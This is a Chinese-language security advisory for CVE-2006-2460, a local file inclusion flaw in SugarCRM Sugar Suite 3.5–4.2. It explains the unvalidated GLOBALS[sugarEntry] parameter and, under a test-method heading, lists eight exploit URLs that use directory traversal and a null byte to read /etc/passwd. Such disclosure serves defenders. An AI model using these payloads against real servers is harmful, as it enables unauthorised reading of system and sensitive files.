发布日期：2006-05-16
更新日期：2006-05-16

受影响系统：

SugarCRM Inc. Sugar Suite 4.2
SugarCRM Inc. Sugar Suite 4.1
SugarCRM Inc. Sugar Suite 4.0 beta
SugarCRM Inc. Sugar Suite 3.5

描述：

---

BUGTRAQ  ID: 17987
CVE(CAN) ID: CVE-2006-2460

Sugar是一种基于Web的CRM系统。

Sugar处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限读取系统上的任意文件，导致敏感信息泄露。

Sugar的多个脚本没有正确验证GLOBALS[sugarEntry]参数的输入，允许攻击者通过目录遍历串包含本地系统上的任意文件。

<**>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/[path]/modules/Administration/CustomizeFields.php?GLOBALS[sugarEntry]=1&amp;theme=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules/Administration/Development.php?GLOBALS[sugarEntry]=1&amp;theme=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules/Administration/DstFix.php?GLOBALS[sugarEntry]=1&amp;theme=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules/Administration/index.php?GLOBALS[sugarEntry]=1&amp;theme=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/include/SubPanel/SubPanelViewer.php?GLOBALS[sugarEntry]=1&amp;module=1&amp;record=1&amp;beanList[1]=1&amp;theme=../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules/Accounts/index.php?GLOBALS[sugarEntry]=1&amp;theme=../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules/Administration/Upgrade.php?GLOBALS[sugarEntry]=1&amp;theme=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules/Bugs/index.php?GLOBALS[sugarEntry]=1&amp;theme=../../../../../../../../../../../../../etc/passwd%00

建议：

---

厂商补丁：

SugarCRM Inc.
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.sugarcrm.com/crm/

浏览次数：2452
严重程度：0（网友投票）